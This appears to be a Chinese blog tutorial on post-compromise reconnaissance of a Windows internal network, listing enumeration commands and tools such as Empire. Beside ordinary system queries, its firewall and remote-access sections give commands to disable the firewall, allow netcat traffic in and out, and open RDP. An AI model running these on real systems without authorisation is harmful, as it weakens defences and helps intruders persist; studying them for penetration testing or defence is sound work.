内网渗透信息收集方法第一篇文章
1. 内网信息收集概述
首先要明确的是,此时的我们应该已经拿下了内网的一台主机,即我们已经完成了所谓的”打点”的过程,那么我们接下来要摸清一下三点:
- 当前主机的机器类型及权限
- 当前网络的完整拓扑结构
- 我们处于当前网络中的哪个位置
对于信息的收集,一定是越全面越好,收集的信息越多,就越有可能发现目标的脆弱资产,就更有利于我们攻击的进行。所有与目标有关的数据都可以算作信息,包含但不限于以下几点:操作系统、权限、网络拓扑及IP段、杀软、端口、服务、补丁信息、网络连接、共享文件夹、当前会话。
2. 内网信息收集常用命令
2.1 查询网络配置信息
1 | ipconfig /all |
2.2 查询操作系统及软件信息
查询操作系统和版本信息
1 | systeminfo | findstr /B /C:"OS" |
查询系统体系结构
1 | echo %processor_architecture% |
查询软件版本及路径
通过wmic查询
1 | wmic product get name,version |
通过powershell查询
1 | powershell "Get-wmiobject -class win32_product | select-object -property name,version" |
2.3 查询本机服务信息
1 | wmic service list brief |
2.4 查询进程列表
查看进程信息和进程用户
1 | tasklist |
查看进程信息
1 | wmic process list brief |
2.5 查看启动程序信息
1 | wmic startup get command,caption |
2.6 查看计划任务
1 | schtasks /query /fo LIST /v |
2.7 查看主机开机时间
1 | net statistics workstation |
2.8 查询用户列表
查询本机用户列表
1 | net user |
查询本地管理员信息
1 | net localgroup administrators |
查询当前在线用户
1 | query user || qwinsta |
2.9 查询当前连接会话
1 | net session |
2.10 查询端口列表
1 | netstat -ano |
2.11 查看补丁列表
1 | systeminfo |
2.12 查询本机共享列表
1 | net share |
2.13 查看路由表和可用arp缓存表
查看路由表
1 | route print |
查看可用的arp缓存表
1 | arp -a |
2.14 查询防火墙相关配置
关闭防火墙
windows server 2003及以下版本
1 | netsh firewall set opmode disable |
windows server 2003以上版本
1 | netsh advfirewall set allprofiles state off |
查看防火墙配置
1 | netsh firewall show config |
修改防火墙配置
win2003及之前版本,允许指定程序全部流量入站出站
1 | netsh firewall add allowedprogram c:\nc.exe "allow nc" enable |
win2003之后的版本,允许指定程序流量入站
1 | netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" |
win2003之后的版本,允许指定程序流量出站
1 | netsh advfirewall firewall add rule name="allow nc" dir=out action=allow program="C:\nc.exe" |
win2003之后的版本,允许3389端口流量入站
1 | netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow |
自定义防火墙日志存储位置
1 | netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log" |
2.15 查看代理相关配置情况
1 | reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" |
2.16 查看并开启远程连接服务
查看远程连接端口
1 | reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber |
开启3389端口
winserver2003开启3389端口
1 | wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 |
winsever2008及winserver2012开启3389端口
1 | wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 |
1 | wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1 |
1 | reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f |
3. 自动化内网信息收集工具
wmic_info.bat
可以直接搜集内网信息并生成html,代码如下
1 | for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A" |
Empire
Empire是基于powershell的后渗透利器,基于debian系实现,可实现诸多后渗透功能,下载链接如下
1 | https://github.com/EmpireProject/Empire |
执行以下命令,可自动搜集主机信息
1 | usemodule situational_awareness/host/winenum |
本文链接: https://yd0ng.github.io/2020/08/26/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-%E4%B8%80/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!